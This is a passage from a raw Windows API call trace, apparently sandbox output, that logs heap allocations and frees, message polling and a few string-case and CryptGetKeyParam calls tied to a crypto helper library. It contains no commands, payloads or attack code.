[0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbd3b) returned 0x96caa8 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0034.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0034.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.123] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.123] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.124] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.125] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0034.126] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.126] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0034.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0034.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.130] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.130] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 